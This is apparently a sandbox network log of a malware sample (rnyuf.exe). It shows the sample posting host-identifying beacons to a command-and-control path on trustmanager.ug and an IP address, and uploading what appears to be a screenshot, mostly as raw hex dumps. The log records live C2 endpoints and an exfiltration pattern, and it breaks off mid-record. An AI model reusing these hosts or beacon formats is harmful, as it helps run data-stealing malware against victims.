Aug 23, 2021 02:09:08.538840055 CEST	16940	OUT	Data Raw: 65 e1 ae d0 de d7 42 aa 9f 46 72 bc 25 45 d8 dc 0c 0f 7a 32 2b 9e 3e 33 f0 ff 00 68 af 29 a7 c6 7a 10 e9 1d df e9 4f 9d 76 17 d5 ea 1d 26 69 73 5c cf fc 26 da 20 ff 00 96 57 74 a3 c6 fa 28 ff 00 96 57 74 73 21 aa 15 3b 1d 40 38 a7 02 6b 96 ff 00 Data Ascii: eBFr%Ez2+>3h)zOv&is\& Wt(Wts!;@8kFGJx5#X\4.?e*r;iXZWb\|C\b-m,)dc].R-&wfi\1J>'i\1Q;Rgy;Q
Aug 23, 2021 02:09:08.593802929 CEST	16975	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:08.595417023 CEST	16976	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
101	192.168.2.3	49827	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:08.672466993 CEST	16977	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:08.698461056 CEST	16978	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:08.698493004 CEST	16978	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
102	192.168.2.3	49828	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:08.706981897 CEST	16979	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: 185.215.113.206 Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:08.707165956 CEST	16979	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:08.707505941 CEST	16989	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:08.723609924 CEST	16992	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:08.767915964 CEST	16995	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:08.768124104 CEST	16997	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:08.768342972 CEST	17000	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:09:08.768455982 CEST	17003	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:08.768728971 CEST	17005	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:08.769198895 CEST	17008	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:08.769475937 CEST	17011	OUT	Data Raw: 03 03 f4 a9 6d 2e a6 b2 ba 8e e6 06 db 24 67 20 f6 f7 07 d4 11 c1 15 ed cb 2e a4 e9 72 75 bd ef fd 74 3c 28 e6 35 55 5e 7e 96 b5 bf ae a7 b6 5a 6b 76 fa fc 3e 1f be 83 00 b5 e3 2c 91 e7 25 1c 5b cd 91 fe 7b 57 8b 7c 67 ff 00 92 87 37 fd 7b 45 fc Data Ascii: m.$g .rut<(5U^~Zkv>,%[{W\|g7{EdI$@? fPxPT1k~Wuo{QA )hBIESs@rl<RE.iZZniAisLh/zu\@4)V$PwsN8vUSd&
Aug 23, 2021 02:09:09.003400087 CEST	17077	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
103	192.168.2.3	49829	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:08.863256931 CEST	17070	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:08.889097929 CEST	17076	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC 